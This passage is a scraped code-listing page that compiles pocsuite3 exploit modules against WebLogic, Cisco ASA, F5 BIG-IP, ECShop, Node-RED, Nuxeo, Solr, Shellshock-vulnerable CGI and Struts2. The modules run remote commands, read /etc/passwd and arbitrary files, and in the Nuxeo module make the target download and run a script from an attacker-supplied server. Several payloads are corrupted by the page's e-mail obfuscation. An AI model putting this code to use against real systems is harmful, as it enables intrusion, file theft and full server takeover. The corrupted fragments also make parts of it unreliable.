        output_url = '{}/bea_wls_internal/{}?{}'.format(
            target, output_file, int(time.time()))
        try:
            r = req.get(output_url, headers=headers)
            if r.status_code == req.codes.ok and flag in r.text:
                return (True, 'success')
            elif r.status_code == 404:
                return (False, '404 no output')
            else:
                return (False, r.status_code)
        except req.exceptions.ReadTimeout:
            return (False, 'timeout')
        except Exception as ex:
            return (False, str(ex))
    '''
    RCE POC
    '''
    # POST the envelope; a 500 means it was deserialized, then verify_result is consulted.
    def weblogic_rce(target):
        url = '{}/wls-wsat/CoordinatorPortType'.format(target)
        # content-type must be text/xml
        payload_header = {'content-type': 'text/xml',
                          'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
        try:
            r = req.post(url, payload_command(),
                         headers=payload_header, verify=False)
            # A 500 indicates the payload was deserialized and executed
            if r.status_code == 500:
                return verify_result(target)
            elif r.status_code == 404:
                return (False, '404 no vulnerability')
            else:
                return (False, '{} something went wrong'.format(r.status_code))
        except req.exceptions.ReadTimeout:
            return (False, 'timeout')
        except Exception as ex:
            return (False, str(ex))
    '''
    verify:
    '''
    result = {}
    pr = urlparse(self.url)
    if pr.port: # and pr.port not in ports:
        ports = [pr.port]
    else:
        ports = [7001, 17001, 27001]
    for port in ports:
        uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
        status, msg = weblogic_rce(uri)
        if status:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = uri
            break
    return self.parse_output(result)
def _attack(self):
Source : CVE-2020-3452.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the Cisco ASA/FTD WebVPN file read (CVE-2020-3452).

    Two traversal URLs are requested (translation-table and
    oem-customization); the first whose body contains ``common.lua`` or
    ``browser_inc.lua`` is recorded, with its path template as ``PoC``.
    Errors are logged and leave ``result`` empty.
    """
    result = {}
    url = self.url
    try:
        poc1 = '{}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
        poc2 = '{}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
        # Both requests are always sent, even when the first already matches.
        resp_poc1 = requests.get(poc1.format(url), verify=False, timeout=5)
        resp_poc2 = requests.get(poc2.format(url), verify=False, timeout=5)
        if ('common.lua' in resp_poc1.text) or ('browser_inc.lua' in resp_poc1.text):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['PoC'] = poc1.format('')
        elif ('common.lua' in resp_poc2.text) or ('browser_inc.lua' in resp_poc2.text):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['PoC'] = poc2.format('')
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def _attack(self):
Source : CVE-2020-5902.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify F5 BIG-IP TMUI RCE (CVE-2020-5902) via the tmsh alias trick.

    Four GETs: create a ``list`` alias for ``bash`` (url1), save ``id`` to
    ``/tmp/cmd`` (url2), run it through the alias (url3), and finally
    delete the alias (url4). ``uid=0(root)`` in the url3 reply is the
    success signal; the login page title is then read as the hostname.
    Note that ``/tmp/cmd`` is left on the device, and that the url4
    cleanup runs outside the try block, so its own failure propagates.
    """
    result = {}
    # NOTE(review): only an "http://" prefix is stripped; an "https://"
    # self.url yields a malformed 'https://https://...' target.
    url = self.url.replace("http://", "")
    try:
        url1 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        url2 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'
        url3 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
        url4 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        requests.get(url1.format(url), verify=False, timeout=5)
        requests.get(url2.format(url), verify=False, timeout=5)
        resp = requests.get(url3.format(url), verify=False, timeout=5)
        if 'uid=0(root)' in resp.text:
            r = requests.get(
                'https://{}/tmui/login.jsp'.format(url), verify=False, timeout=5)
            # NOTE(review): the pattern has a space after '<' (looks like a
            # page-extraction artefact); re.search(...) would return None
            # and .group(1) raise AttributeError — confirm the original.
            hostname = re.search(
                r' < p\stitle=\"(.*?)\">', r.text).group(1).strip().lower()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Hostname'] = hostname
    except Exception as ex:
        logger.error(str(ex))
    # Cleanup: remove the alias created by url1 (NameError if url4 was never
    # bound — only possible if an exception fired before its assignment).
    requests.get(url4.format(url), verify=False, timeout=5)
    return self.parse_output(result)
def _attack(self):
Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the ECShop ``user.php`` Referer-based RCE.

    Builds the 2.x and/or 3.x payloads (per the ``app_version`` option,
    ``Auto`` tries both) around a ``phpinfo()`` call, sends each as the
    ``Referer`` header and looks for ``allow_url_include`` in the reply.
    The first matching version is recorded.
    """
    result = {}
    url = urljoin(self.url, '/user.php?act=login')
    phpcode = "phpinfo()"
    flagText = "allow_url_include"
    # ECShop 2.x payload
    ec2payload = self.gen_ec2payload(phpcode)
    # ECShop 3.x payload
    ec3payload = self.gen_ec3payload(phpcode)
    option = self.get_option("app_version")
    # NOTE(review): `payloads` stays unbound (UnboundLocalError below) when
    # the option is none of "Auto", "2.x", "3.x".
    if option == "Auto":
        payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
    elif option == "2.x":
        payloads = [(ec2payload, '2.x')]
    elif option == '3.x':
        payloads = [(ec3payload, '3.x')]
    for payload, version in payloads:
        headers = {'Referer': payload}
        try:
            rr = requests.get(url, headers=headers)
            if flagText in rr.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Version'] = version
                break
        except ReadTimeout:
            # A timeout ends the loop; other errors try the next payload.
            break
        except Exception as e:
            pass
    return self.parse_output(result)
def parse_output(self, result):
Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443
def _exploit(self, cmd='whoami'):
    """Run ``cmd`` through ``passthru`` via the ECShop Referer payload and return its output.

    Args:
        cmd: shell command embedded in the PHP payload.

    Returns:
        The text found between the hidden ``back_act`` input and either a
        ``<br />`` or ``xxx`` marker, or None when neither payload yields it.
        Request errors are not caught here.
    """
    url = urljoin(self.url, '/user.php?act=login')
    phpcode = 'passthru("{0}");'.format(cmd)
    # ECShop 2.x payload
    ec2payload = self.gen_ec2payload(phpcode)
    # ECShop 3.x payload
    ec3payload = self.gen_ec3payload(phpcode)
    option = self.get_option("app_version")
    # NOTE(review): `payloads` is unbound when the option is unrecognised.
    if option == "Auto":
        payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
    elif option == "2.x":
        payloads = [(ec2payload, '2.x')]
    elif option == '3.x':
        payloads = [(ec3payload, '3.x')]
    for payload in payloads:
        headers = {'Referer': payload[0]}
        resp = requests.get(url, headers=headers)
        # NOTE(review): the '< input' / '< br' markers have a space after
        # '<' (looks like a page-extraction artefact) — confirm the original.
        r = get_middle_text(resp.text, ''' < input type="hidden" name="back_act" value="''', "\n < br />")
        if r:
            return r
        r = get_middle_text(resp.text, ''' < input type="hidden" name="back_act" value="''', 'xxx')
        if r:
            return r
# Register the PoC class with the pocsuite3 framework so it can be loaded and run.
register_poc(DemoPOC)
Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443
async def exploit(url, command, shell=False, access_token=None):
    """Run ``command`` on a Node-RED instance by deploying an exec flow.

    Opens the ``/comms`` WebSocket (authenticating with ``access_token``
    when given) and subscribes to the ``debug`` topic, merges ``EXEC_FLOW``
    into the currently deployed flows with the command filled in, deploys
    the result, and triggers the inject node. Unless ``shell`` is set, the
    first debug message is taken as the command output. On
    KeyboardInterrupt the injected blocks are removed again; otherwise they
    stay deployed on the target.

    Returns:
        The stripped debug output, or None when ``shell`` is True.
    """
    ws_url = url.replace("http", "ws")
    headers = {"Node-RED-API-Version": "v2"}
    if access_token is not None:
        headers["Authorization"] = "Bearer {}".format(access_token)
    async with websockets.connect("{}/comms".format(ws_url)) as websocket:
        if access_token is not None:
            await websocket.send(json.dumps({"auth": access_token}))
            # Wait for the server to acknowledge the token.
            while True:
                response = await websocket.recv()
                message = json.loads(response)
                if "auth" in message and message["auth"] == "ok":
                    print("[+] Successfully authenticated over WebSocket.")
                    break
        print("[+] Establishing RCE link ....")
        await websocket.send(json.dumps({"subscribe": "debug"}))
        current_flows = {"flows": []}
        try:
            resp = requests.get("{}/flows".format(url), headers=headers)
            if "flows" in resp.json():
                current_flows["flows"] = resp.json()["flows"]
            # merge_lists presumably merges by the "id" key — defined elsewhere.
            payload = {"flows": merge_lists(current_flows["flows"], EXEC_FLOW, "id")}
            for flow in payload["flows"]:
                if flow["id"] == EXEC_BLOCK_NAME:
                    flow["command"] = command
            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )
            resp = requests.post("{}/inject/{}".format(url, INJECT_BLOCK_NAME), headers=headers)
            # NOTE(review): `output` is first bound here, so a KeyboardInterrupt
            # before this line leaves `return output` with an UnboundLocalError.
            output = None
            if not shell:
                while output is None:
                    response = await websocket.recv()
                    messages = json.loads(response)
                    for message in messages:
                        if "topic" in message and message["topic"] == "debug":
                            output = message["data"]["msg"].strip()
                            break
        except KeyboardInterrupt:
            # Rebuild the flow list without the injected EXEC_FLOW blocks.
            payload = {"flows": []}
            for current_block in current_flows["flows"]:
                tainted = False
                for block in EXEC_FLOW:
                    if block["id"] == current_block["id"]:
                        tainted = True
                if not tainted:
                    payload["flows"].append(current_block)
            print("\n[+] Cleaning up workflows.")
            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )
            if resp.status_code == 200:
                print("[+] Done.")
            else:
                print("[!] An error occured. Manual cleanup might be required.")
        finally:
            # NOTE(review): close() is a coroutine and is not awaited, so this
            # is a no-op; the `async with` block closes the socket on exit.
            websocket.close()
    return output
def start(url, command, username, password, shell=False):
Source : ruijie_info.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Check a Ruijie ``login.php`` page for embedded super_admin credentials.

    One GET of ``login.php``; the page is flagged when both the
    ``"role":"super_admin","name":"`` and ``","password":"`` fragments are
    present in the source. Note the request itself sits outside the
    try block, so a network error propagates to the caller.
    """
    result = {}
    headers = {
        "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20"
    }
    path = "login.php"
    verify_code = '"role":"super_admin","name":"'
    verify_code2 = '","password":"'
    url = urljoin(self.url, path)
    resp = requests.get(url=url, headers=headers, timeout=8)
    try:
        if verify_code in resp.text and verify_code2 in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Payload'] = "源代码密码泄露,页面搜索admin关键词即可看到密码hash"
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def parse_output(self, result):
Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Trigger the Nuxeo 8.10 EL injection in ``create_file.xhtml``.

    The injected expression makes the server ``wget`` ``note.py`` from the
    ``http_server_ip``/``http_server_port`` options; a 302 or 200 reply
    is recorded as ``status: success``. That oracle only shows the request
    was accepted, not that the download happened. All errors are swallowed
    without logging.
    """
    # NOTE(review): `proxies` is built but never passed to the request.
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    result = {}
    httpServerIp = self.get_option('http_server_ip')
    httpServerPort = self.get_option('http_server_port')
    # Because str.format is applied, the EL braces are doubled ({{ }}) so they survive formatting
    payload_part1 = "/?key=#{{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
        "'wget {0}:{1}/note.py')}}".format(httpServerIp, httpServerPort)
    url = urljoin(self.url, "/nuxeo/create_file.xhtml")
    params = {
        'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
        'directoryNameForPopup': payload_part1
    }
    try:
        rr = requests.get(url, params=params, verify=False)
        if rr.status_code == 302 or rr.status_code == 200:
            result['status'] = 'success'
    except ReadTimeout:
        pass
    except Exception as e:
        pass
    return self.parse_output(result)
def _attack(self):
Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443
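def _shell(self):
    """Second stage of the Nuxeo 8.10 chain: run the ``note.py`` dropped by ``_verify``.

    Calls ``self._verify()`` first (which makes the target ``wget``
    ``note.py``), then sends the same EL primitive with ``python note.py``
    so the script executes on the target.  The HTTP reply is not inspected;
    success is only observable out of band (e.g. on the listener that
    ``note.py`` connects back to).

    NOTE(review): ``getDeclaredMethods()[15]`` / ``[7]`` select ``exec`` /
    ``getRuntime`` by position; that ordering is JVM-build dependent, so a
    silent miss is possible - confirm against the target's JDK.
    """
    self._verify()
    # No str.format here, so the EL braces are written singly.
    payload_part2 = "/?key=#{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
        "'python note.py')}"
    url = urljoin(self.url, "/nuxeo/create_file.xhtml")
    params = {
        'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
        'directoryNameForPopup': payload_part2
    }
    try:
        # verify=False: the target's TLS certificate is deliberately not checked.
        # The response carries no usable signal, so it is not examined.
        requests.get(url, params=params, verify=False)
    except ReadTimeout:
        # The spawned python process may hold the connection open; ignore.
        pass
    except Exception:
        # Best effort: nothing to report either way.
        pass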
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe a ``.cgi``/``.sh`` endpoint for Shellshock through the User-Agent header.

    ``get_url_need(self.url)`` supplies the URL to test; anything that does
    not end in ``.cgi`` or ``.sh`` is skipped.  The header
    ``() { :; }; echo; echo X-Bash-Test: <marker>`` carries a random
    50-character marker; when the first line of the response body is exactly
    ``X-Bash-Test: <marker>`` the URL is recorded in ``result['VerifyInfo']``.
    Any exception is logged with a traceback via ``logger.exception``.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    result = {}
    try:
        vul_url = get_url_need(self.url)
        if vul_url.endswith(('.cgi', '.sh')):
            marker = ''.join(random.sample(string.ascii_letters + string.digits, 50))
            probe = {'User-Agent': '() { :; }; echo; echo X-Bash-Test: %s' % marker}
            body = requests.get(vul_url, headers=probe).text
            # A vulnerable bash executes the trailing echo before the CGI
            # output, so the marker line becomes the first line of the body.
            if body.split('\n')[0] == 'X-Bash-Test: %s' % marker:
                result['VerifyInfo'] = {'URL': vul_url}
    except Exception as e:
        logger.exception(e)
    return self.parse_output(result)
def parse_output(self, result):
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
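def get_link(url):
    """Return the first same-domain ``.cgi``/``.sh``/``.pl`` link found on *url*.

    Fetches the page, pulls every ``href``/``action``/``src`` value ending in
    ``.cgi``, ``.sh`` or ``.pl``, resolves non-``http`` ones against *url*
    with ``getAbsoluteURL``, and returns the first that both exists
    (``is_url_exist``) and is on the same domain (``isSameDomain``).

    Args:
        url: page to scan.

    Returns:
        The matching absolute URL, or ``''`` when nothing qualifies or the
        fetch/parse fails.
    """
    rnt = ''
    try:
        page_content = requests.get(url).text
        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
        for item_url in match:
            if not item_url.startswith('http'):
                item_url = getAbsoluteURL(url, item_url)
            if not is_url_exist(item_url):
                continue
            if isSameDomain(item_url, url):
                rnt = item_url
                break
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit; network/parse failures are still treated as "no link".
        pass
    return rnt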
def getAbsoluteURL(base, url):
Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443
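def _verify(self):
    """Check for Solr arbitrary file read via ``stream.url`` remote streaming.

    For the port in ``self.url`` (8983 when none is given):
      1. list cores through ``/solr/admin/cores?indexInfo=false&wt=json``;
      2. switch on ``requestDispatcher.requestParsers.enableRemoteStreaming``
         through the first core's ``/config`` endpoint;
      3. ask ``/debug/dump?param=ContentStreams`` to stream
         ``file:///etc/passwd``.
    A step-3 reply that lacks ``'No such file or directory'`` records
    ``host:port`` in ``result['VerifyInfo']['URL']``.

    NOTE(review): step 2 rewrites the target's live Solr configuration, so
    this "verify" is intrusive rather than read-only.  Steps 2 and 3 send a
    request body with GET; Solr's Config API is documented for POST, so
    confirm the target honours a GET body.  The step-3 test is loose: any
    reply without the "No such file" text (an error page, say) counts as a
    hit.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    result = {}
    pr = urlparse(self.url)
    ports = [pr.port] if pr.port else [8983]
    for port in ports:
        target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
        # 1. enumerate cores
        url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
        response = req.get(url1, headers=headers, timeout=5)
        # A non-Solr service or a node without cores previously blew up with
        # ValueError/KeyError/IndexError; skip the port instead.
        try:
            cores = json.loads(response.text)["status"]
        except (ValueError, KeyError, TypeError):
            continue
        if not cores:
            continue
        core_name = list(cores)[0]
        # 2. enable requestDispatcher.requestParsers.enableRemoteStreaming
        url2 = target + "/solr/" + core_name + "/config"
        headers = {"Content-type": "application/json"}
        data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
        response = req.get(url2, data=data, headers=headers, timeout=5)
        if 'responseHeader' in response.text and response.status_code == 200:
            # 3. read the file through the now-enabled stream.url
            url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
            headers = {"Content-Type": "application/x-www-form-urlencoded"}
            data = 'stream.url=file:///etc/passwd'
            response = req.get(url3, data=data, headers=headers, timeout=5)
            if 'No such file or directory' not in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                break
    return self.parse_output(result)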
def _attack(self):
Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443
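def _attack(self):
    """Read an arbitrary file from Solr via ``stream.url`` remote streaming.

    Same chain as ``_verify`` - enumerate cores, enable
    ``requestDispatcher.requestParsers.enableRemoteStreaming`` through the
    first core's ``/config``, then stream ``file://<filename>`` through
    ``/debug/dump?param=ContentStreams`` - but the path comes from the
    ``filename`` option and the raw response body is returned in
    ``result['extra']['evidence']``.

    NOTE(review): enabling remote streaming rewrites the target's live Solr
    configuration.  The config and dump requests carry a body on GET; Solr's
    Config API is documented for POST, so confirm the target honours a GET
    body.  A reply without "No such file or directory" (including an
    unrelated error page) is taken as success.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    result = {}
    pr = urlparse(self.url)
    ports = [pr.port] if pr.port else [8983]
    for port in ports:
        target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
        # 1. enumerate cores
        url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
        response = req.get(url1, headers=headers, timeout=10)
        # A non-Solr service or a node without cores previously blew up with
        # ValueError/KeyError/IndexError; skip the port instead.
        try:
            cores = json.loads(response.text)["status"]
        except (ValueError, KeyError, TypeError):
            continue
        if not cores:
            continue
        core_name = list(cores)[0]
        # 2. enable requestDispatcher.requestParsers.enableRemoteStreaming
        url2 = target + "/solr/" + core_name + "/config"
        headers = {"Content-type": "application/json"}
        data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
        response = req.get(url2, data=data, headers=headers, timeout=5)
        if 'responseHeader' in response.text and response.status_code == 200:
            # 3. stream the requested file back through the dump handler
            filename = self.get_option("filename")
            url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
            headers = {"Content-Type": "application/x-www-form-urlencoded"}
            data = 'stream.url=file://{}'.format(filename)
            response = req.get(url3, data=data, headers=headers, timeout=5)
            if 'No such file or directory' not in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                result['extra'] = {}
                result['extra']['evidence'] = response.text
                break
    return self.parse_output(result)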
def _shell(self):
Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe for S2-008 by running ``echo VuLnEcHoPoCSuCCeSS`` through ``?debug=command``.

    The OGNL in ``expression=`` enables static method access, disables
    ``denyMethodExecution`` and returns the command's stdout.  A 200 reply
    containing the marker stores the full probe URL in
    ``result['VerifyInfo']['URL']``; every request error ends the probe with
    an empty result (best effort).

    NOTE(review): the ``[email protected]`` fragments inside the payload are
    an artefact of this page's e-mail obfuscation, not the real OGNL text;
    restore them from the upstream PoC before use.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    marker = "VuLnEcHoPoCSuCCeSS"
    template = ('?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%'
                '23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio'
                'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%'
                '27RECOMMAND%27%29.getInputStream%28%29%29)')
    probe_url = self.url + template.replace("RECOMMAND", "echo " + marker)
    result = {}
    try:
        resp = requests.get(probe_url, headers=HEADERS)
        if resp and resp.status_code == 200 and marker in resp.text:
            result['VerifyInfo'] = {'URL': probe_url}
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
def parse_output(self, result):
Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443
def _attack(self):
    """Run the ``command`` option on the target through the S2-008 ``?debug=command`` primitive.

    The command is substituted for ``RECOMMAND`` in the OGNL expression and
    the whole 200 response body (not just the command's stdout) is returned
    in ``result['Stdout']``.  Request errors are swallowed (best effort).

    NOTE(review): the ``[email protected]`` fragments inside the payload are
    an artefact of this page's e-mail obfuscation, not the real OGNL text;
    restore them from the upstream PoC before use.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    template = ('?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%'
                '23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio'
                'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%'
                '27RECOMMAND%27%29.getInputStream%28%29%29)')
    attack_url = self.url + template.replace("RECOMMAND", self.get_option("command"))
    result = {}
    try:
        resp = requests.get(attack_url, headers=HEADERS)
        if resp and resp.status_code == 200:
            result['Stdout'] = resp.text
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)
Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe for S2-009 by running ``echo VuLnEcHoPoCSuCCeSS`` through a parameter-name OGNL injection.

    The OGNL is appended directly to ``self.url`` (so the base URL is
    expected to end where the expression should start) and is also sent as
    the request body.  On a 200 reply containing the marker the URL and the
    body are stored under ``result['VerifyInfo']`` as ``URL`` and
    ``Postdata``.  Request errors are swallowed (best effort).

    NOTE(review): the ``[email protected]`` fragments inside the payload are
    an artefact of this page's e-mail obfuscation, not the real OGNL text;
    restore them from the upstream PoC before use.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    marker = "VuLnEcHoPoCSuCCeSS"
    template = ("(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),"
                "+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec("
                "%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),"
                "%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),"
                "%[email protected]@getResponse().getWriter(),%23kxlzx.println("
                "%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] ")
    payload = template.replace("RECOMMAND", "echo " + marker)
    probe_url = self.url + payload
    result = {}
    try:
        resp = requests.get(probe_url, headers=HEADERS, data=payload)
        if resp and resp.status_code == 200 and marker in resp.text:
            result['VerifyInfo'] = {'URL': probe_url, 'Postdata': payload}
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
def parse_output(self, result):
Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443
def _attack(self):
    """Run the ``command`` option on the target through the S2-009 parameter-name OGNL primitive.

    The command replaces ``RECOMMAND`` in the OGNL; the expression is both
    appended to ``self.url`` and sent as the request body.  The whole 200
    response body is returned in ``result['Stdout']``.  Request errors are
    swallowed (best effort).

    NOTE(review): the ``[email protected]`` fragments inside the payload are
    an artefact of this page's e-mail obfuscation, not the real OGNL text;
    restore them from the upstream PoC before use.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    template = ("(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),"
                "+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec("
                "%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),"
                "%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),"
                "%[email protected]@getResponse().getWriter(),%23kxlzx.println("
                "%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] ")
    payload = template.replace("RECOMMAND", self.get_option("command"))
    attack_url = self.url + payload
    result = {}
    try:
        resp = requests.get(attack_url, headers=HEADERS, data=payload)
        if resp and resp.status_code == 200:
            result['Stdout'] = resp.text
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)
Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe for S2-013 by running ``echo VuLnEcHoPoCSuCCeSS`` through a ``${...}`` query parameter.

    The OGNL arrives in ``?233=${...}``, enables static method access, runs
    the command and writes ``dbapp=<stdout>`` into the response.  A 200
    reply containing the marker stores the probe URL in
    ``result['VerifyInfo']['URL']``.  Request errors are swallowed (best
    effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    marker = "VuLnEcHoPoCSuCCeSS"
    template = ('?233=%24%7B%23_memberAccess%5B"allowStaticMetho'
                'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()'
                '.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.'
                'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%'
                '23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%'
                '3D%40org.apache.struts2.ServletActionContext%40getResponse().ge'
                'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str'
                'ing(%23d))%2C%23out.close()%7D')
